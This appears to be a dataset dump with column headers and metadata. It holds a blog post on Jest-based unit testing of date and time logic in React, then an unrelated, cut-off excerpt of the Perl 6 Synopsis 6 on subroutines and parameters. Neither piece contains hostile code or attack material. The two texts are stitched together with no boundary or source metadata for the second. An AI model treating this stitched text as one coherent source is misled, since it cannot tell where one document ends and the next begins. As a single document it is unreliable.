text
stringlengths
454
608k
url
stringlengths
17
896
dump
stringclasses
91 values
source
stringclasses
1 value
word_count
int64
101
114k
flesch_reading_ease
float64
50
104
Recipes for unit tests when working with date and time in React/JavaScript In one of our last major projects at my company, we had to deal with real-time flight data. This concluded into processing and calculating with a lot of date and time values. Tests helped, as always, to run everything smoothly and precisely. Now in the aftermath, I want to show you what helped us to write meaningful unit tests. Tools - jest is a beautiful test framework for JavaScript - testing-library/react and testing-library/react-hooks for all the react things - mockdate to, yes, mock the date These tools help you, but it also important to bring in a proper mindset when testing date and time. Mindset - handle only one format in your application. It doesn't really matter if you decide to work with JavaScript Date Objects (the value of new Date()) or its static method Date.now()which returns the number of milliseconds elapsed since January 1, 1970 00:00:00 UTC. Just stick to one and re-format when needed (with date-fns since moment stopped service) - always stub or mock real date and time functions. Never rely on any system time, this will get you into trouble, I promise. Examples Mock the date No matter what you want to test, mock before you start. With jest, it often makes sense to use the beforeEach/All and afterEach/All hooks. import mockdate from "mockdate"const mockdateInit = 1580782960 // 2020-02-04T02:22:40describe("yourTest", () => { beforeEach(() => { mockdate.set(mockdateInit) }) afterAll(() => { mockdate.reset() }) }) As said before, we use mockdate here, which will for now always return mockdateInit for a new Date() call. Sorting If you now want to sort by date or time, let's say make groups of future or past dates, this is fairly easy. Just remember you are now in the time of mockdateInit. You can enhance the previous setup like this: ... const anyOtherDate = 1580782970 ...... it("should be in the future", () => { const result = anyOtherDate > mockdateInit expect(result).toBeTruthy() }) ... Of course, any other calculation based tasks can be tested the same way. Timelapse Sometimes you want to test a timelapse. Let's say, you want to check a state now and any changes in the next 5 minutes. Like the flight data we processed. For that, since you don't really want to wait 5 minutes while your tests are running (and sincerely your co-workers or CI neither), Jests' timer mocks with their advanceTimersByTime method is here to help. Here is a unit test that utilizes the @testing-library/react-hooks and updateEveryMinute hook, which internally updates every full minute. ... const mockDateInit = 1580782960 // 2020-02-04T02:22:40 const mockDateNextFullMinute = 1580782980 // 2020-02-04T02:23:00 const mockDateMinuteAfterNext = 1580783040 // 2020-02-04T02:24:00 const mockDateAfterAfter3Minutes = 1580783100 // 2020-02-04T02:25:00 ...... jest.useFakeTimers() // make sure Jest uses them ...it("should update every full minute after first update", () => { const { result } = renderHook(() => useCurrentTime()) Mockdate.set(mockdateMinuteAfterNext) act(() => jest.advanceTimersByTime(100000)) expect(result.current).toEqual(Math.floor(mockdateMinuteAfterNext / 1000)) Mockdate.set(mockdateAfterAfter3Minutes) act(() => jest.advanceTimersByTime(60000))expect(result.current).toEqual(Math.floor(mockdateAfterAfter3Minutes / 1000)) }) As you can see: We test and then update mockdate so it returns a new date mock it the next iteration. Wrap it up So I hope, that gave you some ideas, when you write unit tests for a JavaScript app that uses a date and time-relevant data. If you have a relevant use case and don't know how to test it – leave a comment!
https://thomasrutzer.medium.com/recipes-for-unit-tests-when-working-with-date-and-time-in-react-javascript-cbd1ad2ef9e5
CC-MAIN-2022-33
refinedweb
586
65.12
Hi I have 2 question: 1-)I know vector class in stl but i want to make a multi-dimensional array.While user enter some parameters its lengh will grow. How can i do this with "pure c".Only way linked list?Or are there another ways? 2-)In c++ i try : It gives error.It gives error.Code: #include <iostream> using namespace std; int main() { int x,y; cout << "first number"; cin >> x; cout << "second nunmber"; cin >> y; int * a[][] = new int[x][y]; delete[] a; return 0; } How can i declare multi dimensional array with new in c++ thanks.
http://cboard.cprogramming.com/cplusplus-programming/78986-multi-dimensional-array-runtime-printable-thread.html
CC-MAIN-2013-48
refinedweb
101
76.93
0 Having worked with txt files, I'm learning about binary now. My code below works for a while then bombs out, can you point me towards a method or module to read binary data line by line? The crypto module requires a buffer (don't know how to create one of those) or a string. from Crypto.Cipher import AES USEFILE = 'picture.bmp' class encryptData(): def __init__(self, file): blockSize = 32 self.file = file secretKey = os.urandom(blockSize) self.dataFile = open(file, "rb") cipher = AES.new(secretKey, AES.MODE_CFB) if self.dataFile: newFile = self.dataFile.readlines() for lines in newFile: print cipher.encrypt(lines) print secretKey run = encryptData(USEFILE) I'm looking to read a binary file and encrypt it. Many thx.
https://www.daniweb.com/programming/software-development/threads/234677/encrypting-binary-data-with-aes-crashes
CC-MAIN-2016-50
refinedweb
123
70.39
This article assumes you are familiar with declaring and using managed types and the .NET Garbage Collector. Creating your first web service is incredibly easy if you use C# or VB.NET (see my previous article for details). Writing a WebService using managed C++ in .NET is also extremely simple, but there are a couple of 'gotcha's that can cause a few frustrating moments. My first suggestion is to use the Visual Studio .NET Wizards to create your WebService (in fact it's a great idea for all your apps when you are first starting out). This is especially important if you are moving up through the various builds of the beta bits of .NET. What is perfectly acceptable in one build may fail to compile in another build, and it may be difficult to work out which piece of the puzzle you are missing. Using the Wizards can get you a managed C++ WebService up and running in minutes, but things can start to get a little weird as soon as you try something a little more risqué. For this example I have created a service called MyCPPService by using the Wizard. Simply select File | New Project and run through the wizard to create a C++ WebService. MyCPPService A new namespace will be defined called CPPWebService, and within this namespace will be the classes and structures that implement your webservice. For this example I have called the class MyService. Other files that are created by the wizard include the .asmx file that acts as a proxy for your service; the config.web file for configuration settings, and the .disco file for service discovery. Once you compile the class your assembly will be stored as CPPWebService.dll in the /bin directory. CPPWebService MyService I wanted to mimic the C# WebService created in my previous article, but with a few minor changes to illustrate using value and reference types. With this in mind I defined a Value Type structure ClientData and a managed reference type ClientInfo within the namespace that would both contain a name and an ID (string and int values respectively). ClientData ClientInfo string int __value public struct ClientData { String *Name; int ID; }; __gc public class ClientInfo { String *Name; int ID; }; In order to return an array of objects a quick typedef is also declared typedef ClientData ClientArray[]; In a similar fashion I defined my MyService class as a simple managed C++ class with three methods: MyMethod is a simple method that GetClientData GetClientsData ClientInfo // CPPWebService.h #pragma once #using "System.EnterpriseServices.dll" namespace CPPWebService { __value public struct ClientData { String *Name; int ID; }; __gc public class ClientInfo { String *Name; int ID; }; typedef ClientData ClientArray[]; __gc class MyService { public: [WebMethod] int MyMethod(); [WebMethod] ClientData GetClientData(); [WebMethod] ClientArray GetClientsData(int Number); }; } The important thing to notice about the function prototypes is the [WebMethod] attribute - this informs the compiler that the method will be a method of a web service, and that it should provide the appropriate support and plumbing. The method you attach this attribute to must also be publicly accessible. [WebMethod] The implementation (.cpp) file is as follows. #include "stdafx.h" #using <mscorlib.dll> #using "System.Web.dll" #using "System.Web.Services.dll" using namespace System; using namespace System::Web; using namespace System::Web::Services; #include "CPPWebService.h" namespace CPPWebService { int MyService::MyMethod() { return 42; } ClientData MyService::GetClientData() { ClientData data; data.Name = new String("Client Name"); data.ID = 1; return data; } ClientArray MyService::GetClientsData(int Number) { // simple sanity checks if (Number < 0 || Number > 10) return 0; ClientArray data = new ClientData __gc[Number]; if (Number > 0 && Number <= 10) { for (int i = 0; i < Number; i++) { data[i].Name = new String("Client "); data[i].Name->Concat(i.ToString()); data[i].ID = i; } } return data; } }; Note the use of the syntax i.ToString(). In .NET, value types such as int's and enums can have methods associated with them. i.ToString() simply calls the Int32::ToString() for the variable i. i.ToString() Int32::ToString() One huge improvement of .NET beta 2 over beta 1 is that you no longer need to mess around with the XmlIncludeAttribute class to inform the serializer about your structure. A few bugs that either caused things to misbehave, or worse - not run altogether - have also been fixed. Writing a WebService in MC++ is now just as easy in C++ as it is in C#, with the advantage that you can mix and match native and managed code while retaining the raw power of C++. XmlIncludeAttribute Once you have the changes in place you can build the project then test the service by right clicking on the CPPWebService.asmx in the Solution Explorer in Visual Studio and choosing "View in Browser". The test page is shown below. Clicking on one of the methods (say, GetClientsData) results in a proxy page being presented which allows you to invoke the method directly from your browser. The GetClientsData method takes a single int parameter which you can enter in the edit box. int When invoked this returns the following: Writing WebServices using Visual C++ with managed extensions is just as easy as writing them using C# or VB.NET, as long as you remember a few simple things: use attributes, declare your classes as managed and make them publicly accessible. Using the Visual Studio.NET wizards makes writing and deploying these services a point and click affair, but even if you wish to do it by hand then the steps involved are extremely simple. Oct 18 - updated for .NET beta 2 This article, along with any associated source code and files, is licensed under The Code Project Open License (CPOL) struct MatchingPatientData<br /> {<br /> BSTR PatientId;<br /> BSTR FirstName;<br /> BSTR LastName;<br /> }; HRESULT QueryPatientsSimple<br /> (<br /> MatchingPatientData** QueryPatientsSimpleResult, <br /> int* QueryPatientsSimpleResult_nSizeIs<br /> ); General News Suggestion Question Bug Answer Joke Praise Rant Admin Use Ctrl+Left/Right to switch messages, Ctrl+Up/Down to switch threads, Ctrl+Shift+Left/Right to switch pages.
https://www.codeproject.com/Articles/1043/Your-first-managed-C-Web-Service?msg=1014467
CC-MAIN-2017-43
refinedweb
992
54.32
Adding a MODATA_COLOR array in my object On 15/11/2013 at 04:06, xxxxxxxx wrote: Hi, i have the following code in a Python Effector(Full) and the function md.SetArray(c4d.MODATA_COLOR, clrs, True) doesn't seem to set my new colors in the array. Printing "print clrs =md.GetArray(c4d.MODATA_COLOR)" says None. So i suppose my object is missing this MODATA_COLOR array. The md.SetArray(c4d.MODATA_MATRIX, marr, True) is working ok, so the MODATA_MATRIX is preset. How can I add the MODATA_COLOR array to my md object? I ve tried with md.AddArray(40000001) and different possibilieties but doesn t seem to work. Any ideea? Thanks Screenshot: import c4d from c4d.modules import mograph as mo from random import randint #Welcome to the world of Python def randomColor() : r = randint(0,255) / 256.0 g = randint(0,255) / 256.0 b = randint(0,255) / 256.0 color = c4d.Vector(r*4,g*10,b*20) return color def main() : md = mo.GeGetMoData(op) if md==None: return False cnt = md.GetCount() marr = md.GetArray(c4d.MODATA_MATRIX) uvw = md.GetArray(c4d.MODATA_UVW) print uvw fall = md.GetFalloffs() for i in reversed(xrange(0, cnt)) : marr _._ off = marr.off+fall*100.0 print marr clrs = md.GetArray(c4d.MODATA_COLOR) print clrs clrs=[] for x in reversed(xrange(0, cnt)) : clrs.append(randomColor()) print clrs print '_____' print md.GetCurrentIndex() print md.GetArrayDescID(0) print md.GetArrayIndex(40000000) print md.GetArrayID(md.GetArrayIndex(40000004)) print md.GetName(0) print md.GetIndexName(0) print '_____' #print md.AddArray(40000001) md.SetArray(c4d.MODATA_MATRIX, marr, True) md.SetArray(c4d.MODATA_COLOR, clrs, True) print md.GetArray(c4d.MODATA_COLOR) return True _ ___ On 15/11/2013 at 07:48, xxxxxxxx wrote: @admin : how should one use "square brackets" here ? [ i ] EDIT : mmm, appears to work. On 15/11/2013 at 19:01, xxxxxxxx wrote: You've got some errors in your for loop. Try it like this. for i in reversed(xrange(0, cnt)) : marr[i].off = marr[i].off+fall[0]*100 -ScottA On 16/11/2013 at 02:44, xxxxxxxx wrote: Thanks, Scott. But I don t want to change the position in my object, I want to change the colors. So, I ve tried to take the colors from the object with md.GetArrayc4d.MODATA_COLORS), but it gives me None. So, then I thought to apply the array to the md Object with SetArray(...,my_array_of_clrs,true), but doesnt seems to work(no array is added). So I saw another function there, md.AddArray(...) but I m not sure how to use it to push my array into the Modata Object. Any ideea? On 16/11/2013 at 06:47, xxxxxxxx wrote: I might sound grumpy, but I am not willing anymore to read such messy code. However, here is an example on how to write the color channel for modata particles (including some random noise for the position). import c4d from c4d.utils import noise from c4d.modules import mograph as mo def getNoiseVector(p, uniform=False, negative=True) : """ :param p : input vector :param uniform : greyscale vector :param negative : include negative values :return : c4d.Vector """ if uniform and negative: n = noise.SNoise(p) return c4d.Vector(n, n, n) elif uniform: n = noise.Noise(p) return c4d.Vector(n, n, n) elif negative: return c4d.Vector(noise.SNoise(c4d.Vector(p.x, p.y, p.z)), noise.SNoise(c4d.Vector(p.z, p.x, p.y)), noise.SNoise(c4d.Vector(p.y, p.z, p.x))) else: return c4d.Vector(noise.Noise(c4d.Vector(p.x, p.y, p.z)), noise.Noise(c4d.Vector(p.z, p.x, p.y)), noise.Noise(c4d.Vector(p.y, p.z, p.x))) def main() : md = mo.GeGetMoData(op) if md==None: return False # writing the matrices array with some position noise cnt = md.GetCount() marr = md.GetArray(c4d.MODATA_MATRIX) for i in reversed(xrange(0, cnt)) : marr[i].off = getNoiseVector(c4d.Vector(i,0,0)) * 200 # writing the color array with some color noise carr = md.GetArray(c4d.MODATA_COLOR) for i in reversed(xrange(0, cnt)) : carr[i] = getNoiseVector(c4d.Vector(i,0,0), False, False) # write our data back md.SetArray(c4d.MODATA_COLOR, carr, False) md.SetArray(c4d.MODATA_MATRIX, marr, False) return True The result will look something like this : On 16/11/2013 at 11:08, xxxxxxxx wrote: Hi, littledavid. First: my code desnt look good, I admit. But is the first code I am trying in c4d :). So, apologise. Second: your code may be beautifull, but it gives me the same error: TypeError: 'NoneType' object does not support item assignment , on line : carr = getNoiseVector(c4d.Vector(i,0,0), False, False) . So, my problem is that I can't assign an array on that carr in my specific object(is a Voxygen object ). So, I ve tried with AddArray , but I don't know to use it. So, any idea? Thanks for your effort :) _ _ On 16/11/2013 at 11:24, xxxxxxxx wrote: What is a Voxgen object ? Is it that voxelizer addon by Paul Everett ? I suppose it does act as an MoGraph generator. When for carr = md.GetArray(c4d.MODATA_COLOR) carr is None for that object, there has to be a inconsitency with that plugin i guess, as the defintion of GetArray is : MoData.GetArray(id)[]() Get an array. Parameters:| id (int) – The ID of the array: _<_t_>_ > MOGENFLAG_CLONE_ON| Particle is visible. > ---|--- > MOGENFLAG_DISABLE| Particle is permanently disabled. > MOGENFLAG_BORN| Particle is just generated (internal use only). > MOGENFLAG_MODATASET| The [ MoData]() has been set and doesn't need the input of the transform panel. > MOGENFLAG_COLORSET| The [ MoData]() color has been set and doesn't need to be updated. > MOGENFLAG_TIMESET| The [ MoData]() time has been set and doesn't need to be updated._/t> So you are guaranteed to get a list. It is a bit difficult to solve your problem without that plugin. On 16/11/2013 at 11:32, xxxxxxxx wrote: Yea, this was also my first ideea. Bad design in the plugin :). You are right, is the Voxelizer(mograph generator,like Random). So is not my fault that I don t know how to use the c4d AP I, but a plugin problem. Anyway, Ill try to add that blody array in some way...:) On 16/11/2013 at 11:46, xxxxxxxx wrote: Well, as i said - normally you are guaranteed to find the default arrays (even if they are bugged and empty like the size array). You can try to add the array manually, but i doubt that it will work (as you do expect the color to be processed in the viewport). The descid for the color array would be : (40000001, 3, 0) | 40000001 md.AddArray(c4d.DescID(c4d.DescLevel(40000001), c4d.DescLevel(3), c4d.DescLevel(0))) edit : FYI, i wouldn't call it bad design in the plugin, as paul everett is also one of the authors of MoGraph, so he most likely knowing what hes doing. It is more a documentation problem.
https://plugincafe.maxon.net/topic/7545/9449_adding-a-modatacolor-array-in-my-object
CC-MAIN-2020-50
refinedweb
1,177
61.63
Unused templates From ArchWiki This page lists all pages in the Template namespace that are not included in another page. Remember to check for other links to the templates before deleting them. Showing below up to 8 results in range #1 to #8. View (previous 250 | next 250) (20 | 50 | 100 | 250 | 500) - Template:AR (other links) - Template:Game new (other links) - Template:Games start new (other links) - Template:I18n (other links) - Template:Note (Español) (other links) - Template:Related articles start (العربية) (other links) - Template:Tip (正體中文) (other links) - Template:Warning (正體中文) (other links) View (previous 250 | next 250) (20 | 50 | 100 | 250 | 500)
https://wiki.archlinux.org/index.php?title=Special:UnusedTemplates&limit=250&offset=0
CC-MAIN-2017-17
refinedweb
104
55.58
#include <c4d_canimation.h> Gets the number of keys in the curve. Gets the const key at index in the curve. Gets the key at index in the curve. Finds the const key at the given time. Finds the key at the given time. Adds a key to the curve. Adds a key to the curve but retains the curve's current curvature. Inserts a key into the curve. Deletes a key from the curve. Moves a key in the curve. Removes all keys from the curve. Calculates the Hermite spline between two sets of key values. Calculates the soft tangents (i.e. auto interpolation) around a key. Computes the tangents of a key, taking into account all options like zero slope, link slope etc. Gets the value calculated at time, taking into account things like time curves. Gets the track of the curve. Sets the defaults for key kidx of the curve. This includes lock, mute, clamp, break, auto properties, interpolation and tangents. This setup a value and complete the missing properties with the defaults. Sets keys dirty. Private. Gets the start time of the curve. Gets the end time of the curve. Finds the next unmuted key (read-only). Finds the next unmuted key (writable). Finds the previous unmuted key (read-only). Finds the previous unmuted key (writable).
https://developers.maxon.net/docs/Cinema4DCPPSDK/html/class_c_curve.html
CC-MAIN-2021-17
refinedweb
219
80.38
Difference between revisions of "Simrel/Contributing to Simrel Aggregation Build" Revision as of 16:22, 29 October 2016 Contents - 1 Get the simrel.build project - 2 Configuration - 3 Edit the aggregation description and models - 4 The best format and process for contributing to Sim. Release - 5 Pushing your changes These instructions outline how to contribute to the aggregation build for the common repository. These instructions were substantially changed in August of 2012, to accommodate migration to new source repository, and at the same time a rename of the main project needed from that repository. The instructions and process for Juno (SR1 and SR2) are very similar to those for Kepler (SR0, in June 2013) except for the branch to use to for modifications/updates; Juno_maintenance for the former, master for the latter. For history of migration and change of project names, see bug 359240. These instructions were also updated when moving to Gerrit, as discussed in bug 422215. However, those change are backward-compatible so there are also relevant maintenance branches of the aggregator. If at anytime, there are questions, issues or problems, don't hesitate to ask on cross-project list, or open a cross-project bug. Get the simrel.build project If you don't have it already, you'll need to install Eclipse EGit, from common repository or their own repository at (previously called "b3 aggregator") - To be most current, it is best to use Eclipse 4.5 (Mars) and use the latest 1.0.x version of the CBI Aggregator Editor, installed from CBI's Aggregator "4.5 repo", at following URL: - - Note: As far as is known, any EPP Package (or, plain Eclipse Platform) should work, but, you will (naturally) also need EGit installed to work with *.b3aggrcon files -- so the Eclipse "Standard" EPP package it a good choice to start with. - For more detail, see the instructions to install the CBI Aggregator Editor (and get the above mentioned project in your workspace). - Open the file simrel.b3aggrusing the Aggregator Model Editor Configure the workspace [This section originally copied from Platform-releng/Git_Workflows#Configure_the_workspace and then modified. On the General > Workspace preference page, set New text file line delimiter to Unix. Configuring the repo This section originally copied from Platform-releng/Git_Workflows#Configuring_the_repo.). Configuring the workspace content types By default, the b3aggr file and b3aggrcon file types will not be recognized by Eclipse and thus treated as "binary" files. This, for example, will prevent you from using the "Convert Line Endings" function on these files. Because of several issues with Git, EGit, and mixed line endings, we follow the convention of trying to always have only "LF" in the repository version of the files. It is strongly recommended to have only the "LF" version of the file in your workspace too. But, in some cases (due to mistakes or your own settings) you may have to "manually" change the CRLF back to LF and then commit and push those changes. One way to enable these file types to be seen as "text files" is to go into content type preferences, and associate *.b3aggr and *.b3aggrcon files with the content type of "XML". After doing this you may have to go back into "associated editors" and reset CBI Aggregator Editor to be the default editor for *.b3aggr files (or, else, the XML editor will be the default, and you really should not edit that file with XML editor, except in very specialized circumstances). Edit the aggregation description and models For new project contributions - Create the following elements (New Child) under top Aggregation: node or Validation set:. - One or more Contacts (show Property View to specify both Email and Name). [It must be a real email, not dev list]. - A Contribution (specify Label and link to Contact) - A Mapped Repository (specify Location: URL of your p2 repository) - Your Features (select name from features found in your repository, select Categories from pre-defined set, specify exact version to be included in aggregation under Version Range) - To create your b3aggrcon file, select your specific. Be sure to "pull" to be sure you have current contents of every thing (with no conflicts). To ensure that your contribution will not break the build, right-click on top-most Aggregation: node and - Validate checks the general XML and EMF Model validity (short running), then - Validate Aggregation checks the whole model specifies correct and valid repo locations and compatibility dependencies (long running). - Commit and Push. At this point, you are ready to commit and push your contribution. You will need to check in changes to the simrel.b3aggrfile, as well as your <projectname>.b3aggrconfile. Updating contributions - To change things like Contributors (contacts), Categories, Features (adding or removing), you should use the Aggregator Editor with the top level simrel.b3ag.b3ag.b3aggrfile which will modify your project's b3aggrfile as well. - Now use the contextMenu>Validate on your Contribution and make sure the validation completes successfully, with no errors flagged with red X's. - When done, commit the simrel.b3aggrfile as well as your project.b3aggrfile. (Note that other .b3aggrfiles may have been re-generated, possibly simply re-ordering attributes or changing whitespace. You can ignore these.) - To change values of feature versions, or repository URLs, you can directly change your projectname.b3aggrconfile with text editor (or build scripts) and check those in, in isolation. Of course, you can and should still use the Aggregator Model Editor, and it is often desirable to do so, as it will do a "validate aggregation" and will tell you if something is wrong. For example, if there is a typo, and the repository URL does not point to a valid repository, you'll know about it right away, if you use the Aggregator Model. Categories The overall categories used in the common repository are the responsibility of the Planning Council (in that they have the final say about any new ones, removals, etc.). So ... please open a cross-project bug if you'd like to propose new categories or some reorganization. But otherwise, feel free to add or remove your features to what ever categories you think are appropriate (using the full aggregator editor, since two files are changed when doing so) and others will open bugs if something seems wrong, or in the wrong category. Runtime Target Platform Category Some features (or bundles) are not intended to be installed into an IDE ... they do not contribute to the IDE (such as menu items, etc.). By convention, such features should be placed in the "EclipseRt Target Platform Category". This would be the case for, say, a "server" that someone was coding and testing for. In some cases, a runtime feature might "cause harm" (or, change behavior) if a user mistakenly installed it into their IDE. To prevent a feature (or bundle) from being installed into an IDE, the current "process" is for that feature or bundle to specify a negative requirement on a "magic IU". This is usually done in a p2.inf file, with contents of # this bundle should not be installed into IDE requires.0.namespace = A.PDE.Target.Platform requires.0.name = Cannot be installed into the IDE requires.0.range = 0.0.0 The details of the "magic" solution may change in Juno, as a cleaner solution is being discussed in bug 365004 ... it would be a similar "negative requirement" but just may be on a different (non magic) IU. b3aggrcon file. When you add the new child to b3ag Simple repo, and specify, exact versions The best format to use, in b3ag b3aggrcon file. That is, b3aggrcon file should be last step in the process. Along with that, your b3ag.b3ag.b3ag write access to this repository location, then open a bugzilla entry or send an email to the webmaster, explaining which project you are working with, and CC the Planning Council chairperson (currently david_williams@us.ibm.com). (Note: To control "inactive committers", once per year, usually around SR1, changes for. [Reminder:.]) Then you can push directly your commit to the target branch on the remote repo (ie if you want to update the next release, push directly to master, if you want to update the Kepler release, push to the Kepler_maintenance branch, and so on...
http://wiki.eclipse.org/index.php?title=Simrel/Contributing_to_Simrel_Aggregation_Build&diff=next&oldid=411163
CC-MAIN-2020-16
refinedweb
1,374
52.7
24208/does-python-s-time-time-return-the-local-or-utc-timestamp You can use the following code block: x=range(1,100) len(x) Output: ...READ MORE Use this import os os.path.exists(path) # Returns whether the ...READ MORE print(datetime.datetime.today()) READ MORE The time.time() function returns the number of seconds since ...READ MORE suppose you have a string with a ...READ MORE if you google it you can find. ...READ MORE Syntax : list. count(value) Code: colors = ['red', 'green', ...READ MORE The print() function is use to write ...READ MORE The print() is getting called multiple times ...READ MORE OR Already have an account? Sign in.
https://www.edureka.co/community/24208/does-python-s-time-time-return-the-local-or-utc-timestamp
CC-MAIN-2020-10
refinedweb
112
81.49
MyConfig.configure() not getting called. Hi guys, trying a simple hello world to get a feel for RL2 today. Feels very different from RL1 so I'm a little lost. I'm not getting a trace from HelloConfig.configure. What gives? Main class package { import flash.display.Sprite; public class RL_Hello extends Sprite { private var _app:HelloApp; public function RL_Hello() { trace("RL_Hello"); _app = new HelloApp(); addChild(_app); } } } HelloApp.as package { import flash.display.Sprite; import robotlegs.bender.framework.api.IContext; import robotlegs.bender.framework.impl.Context; import robotlegs.bender.bundles.mvcs.MVCSBundle; public class HelloApp extends Sprite { private var _context:IContext; public function HelloApp() { trace("HelloApp"); _context = new Context() .install(MVCSBundle) .configure(HelloConfig, this); } } } HelloConfig.as package { import flash.display.DisplayObjectContainer; import robotlegs.bender.extensions.mediatorMap.api.IMediatorMap; import robotlegs.bender.framework.api.IConfig; import robotlegs.bender.framework.api.IContext; import robotlegs.bender.framework.api.LogLevel; public class HelloConfig implements IConfig { [Inject] public var context:IContext; [Inject] public var mediatorMap:IMediatorMap; [Inject] public var contextView:DisplayObjectContainer; public function configure():void{ trace("HelloConfig.configure"); context.logLevel = LogLevel.DEBUG; mediatorMap.map(HelloView).toMediator(HelloMediator); context.lifecycle.afterInitializing(init); } private function init():void{ trace("HelloConfig.init"); contextView.addChild(new HelloView()); } } } Comments are currently closed for this discussion. You can start a new one. Keyboard shortcuts Generic Comment Form You can use Command ⌘ instead of Control ^ on Mac Support Staff 1 Posted by Ondina D.F. on 16 Nov, 2012 01:37 PM Hi Joel, I do the configuration like this: MainView.as ApplicationContext.as Does that help? Ondina Support Staff 2 Posted by Shaun Smith on 16 Nov, 2012 02:34 PM In the latest version you have to supply the view wrapped in a ContextView object. I think I updated all the readmes, but it's possible that I missed some. .configure(new ContextView(this)) Shaun Smith 3 Posted by Joel Stransky on 16 Nov, 2012 05:09 PM Thanks for the example Ondina. It always helps understand intent when I see things used differently. For now I want to address Shaun's comment first and then I'll contemplate a different structure. @Shaun, here's my updated bootstrap: but now I get an injector error. Error: Injector is missing a mapping to handle injection into property "contextView" of object "[object HelloConfig]" with type "HelloConfig". I'm not sure how to handle that mapping. 4 Posted by Joel Stransky on 16 Nov, 2012 05:51 PM I'm borrowing this approach from by the way. Support Staff 5 Posted by Ondina D.F. on 16 Nov, 2012 06:58 PM This works: View _context = new Context() .install(MVCSBundle) .install(ContextViewExtension) .configure(AppConfig) .configure(new ContextView(this)); AppConfig.as [Inject] public var contextView:ContextView; //===contextView type is ContextView !!! ….. private function init():void { // add the view that has the mediator mapped to it contextView.view.addChild(new MessageWriterView()); Support Staff 6 Posted by Shaun Smith on 16 Nov, 2012 07:21 PM Ah yes, I'll need to update those examples. The ContextView is mapped into the injector as ContextView. Inject that and you can access the wrapped view object. It may seem like a bit of a silly change, but mapping a raw DisplayObjectContainer directly into the injector always felt odd and unclear to me. The new way is much more explicit I think. Also, the whole context.configure(this)thing was super unclear. 7 Posted by Joel Stransky on 16 Nov, 2012 07:22 PM Sorry if this triple posted. I'm not seeing this thread update. I thought that the MVCSBundle already installed ContextViewExtension. Changing the type to ContextView worked. It seems redundant to have to say contextView.view So now the only problem is, the event I dispatch from my view constructor is not being caught by its mediator. HelloView.as HelloMediator.as 8 Posted by Joel Stransky on 16 Nov, 2012 07:32 PM Ok, got the mediator to catch it but had to move to the dispatch to onAddedToStage. I wouldn't normally dispatch within the constructor anyway but I'm just hacking at the moment to see how the parts work together. Not sure if it means anything but at first I didn't remove the ADDED_TO_STAGE listener within onAddedToStage as is common and my event got handled twice in the mediator. Once I added the remove it worked as expected but I'm curious as to why that happened. See, this is why I love robotlegs so much. From this extremely basic example, I already feel like I could dive into a large app. Support Staff 9 Posted by Shaun Smith on 16 Nov, 2012 07:42 PM Yup, I imagine that your custom event was being fired too soon (a view object must be constructed before it can be parented). Not sure about the double added-to-stage though - that's a weird one. The ContextViewExtension is indeed installed by the MVCSBundle - it's job is to watch the configure()method for a ContextViewobject and map it into the injector:... Similarly, the StageSyncExtensioninspects ContextViewobjects and auto initializes the Context:... Support Staff 10 Posted by Ondina D.F. on 20 Nov, 2012 10:14 AM Joel, this seems to be resolved. If you want to continue this discussion, feel free to reopen it. Ondina D.F. closed this discussion on 20 Nov, 2012 10:14 AM.
http://robotlegs.tenderapp.com/discussions/robotlegs-2/395-myconfigconfigure-not-getting-called
CC-MAIN-2019-13
refinedweb
890
51.04
Synopsis 6by Damian Conway, Allison Randal April 09, 2003 Editor's note: this document is out of date and remains here for historic interest. See Synopsis 6 for the current design information. This document summarizes Apocalypse 6, which covers subroutines and the new type system. Subroutines and Other Code Objects Subroutines (keyword: sub) are noninheritable routines with parameter lists. Methods (keyword: method) are inheritable routines that always have an associated object (known as their invocant) and belong to a particular class. Submethods (keyword: submethod) are noninheritable methods, or subroutines masquerading as methods. They have an invocant and belong to a particular class. Multimethods (keyword: multi) are routines that do not belong to a particular class, but which have one or more invocants. Rules (keyword: rule) are methods (of a grammar) that perform pattern matching. Their associated block has a special syntax (see Synopsis 5). Macros (keyword: macro) are routines whose calls execute as soon as they are parsed (i.e. at compile-time). Macros may return another source code string or a parse-tree. Standard Subroutines The general syntax for named subroutines is any of: my RETTYPE sub NAME ( PARAMS ) TRAITS {...} our RETTYPE sub NAME ( PARAMS ) TRAITS {...} sub NAME ( PARAMS ) TRAITS {...} The general syntax for anonymous subroutines is: sub ( PARAMS ) TRAITS {...} "Trait" is the new name for a compile-time ( is) property. See Traits and Properties Perl5ish Subroutine Declarations You can still declare a sub without parameter list, as in Perl 5: sub foo {...} Arguments still come in via the @_ array, but they are constant aliases to actual arguments: sub say { print qq{"@_"\n}; } # args appear in @_ sub cap { $_ = uc $_ for @_ } # Error: elements of @_ are constant If you need to modify the elements of @_, then declare it with the is rw trait: sub swap (*@_ is rw) { @_[0,1] = @_[1,0] } Blocks Raw blocks are also executable code structures in Perl 6. Every block defines a subroutine, which may either be executed immediately or passed in as a Code reference argument to some other subroutine. "Pointy subs" The arrow operator -> is almost a synonym for the anonymous sub keyword. The parameter list of a pointy sub does not require parentheses and a pointy sub may not be given traits. $sq = -> $val { $val**2 }; # Same as: $sq = sub ($val) { $val**2 }; for @list -> $elem { # Same as: for @list, sub ($elem) { print "$elem\n"; # print "$elem\n"; } # } Stub Declarations). Globally Scoped Subroutines Subroutines and variables can be declared in the global namespace, and are thereafter visible everywhere in a program. Global subroutines and variables are normally referred to by prefixing their identifier with *, but it may be omitted } Lvalue Subroutines { my $proxy is Proxy( FETCH => sub ($self) { return lastval(); }, STORE => sub ($self, $val) { die unless check($passwd); lastval() = $val; }, ); return $proxy; } Operator Overloading Operators are just subroutines with special names. Unary operators are defined as prefix or postfix: sub prefix:OPNAME ($operand) {...} sub postfix:OPNAME ($operand) {...} Binary operators are defined as infix: sub infix:OPNAME ($leftop, $rightop) {...} Bracketing operators are defined as circumfix. The leading and trailing delimiters together are the name of the operator. sub circumfix:LEFTDELIM...RIGHTDELIM ($contents) {...} sub circumfix:DELIMITERS ($contents) {...} If the left and right delimiters aren't separated by " ...", then the DELIMITERS string must have an even number of characters. The first half is treated as the opening delimiter and the second half as the closing. Operator names can be any sequence of Unicode characters. For example: sub infix:(c) ($text, $owner) { return $text but Copyright($owner) } method prefix:± (Num $x) returns Num { return +$x | -$x } multi postfix:! (Int $n) { $n<2 ?? 1 :: $n*($n-1)! } macro circumfix:<!--...--> ($text) { "" } my $document = $text (c) $me; my $tolerance = ±7!; <!-- This is now a comment --> Parameters and Arguments Perl 6 subroutines may be declared with parameter lists. By default, all parameters are constant. Arguments destined for required parameters must come before those bound to optional parameters. Arguments destined for positional parameters must come before those bound to named parameters. Invocant Parameters invocants are specified at the start of the parameter list, with a colon terminating the list of invocants: multi 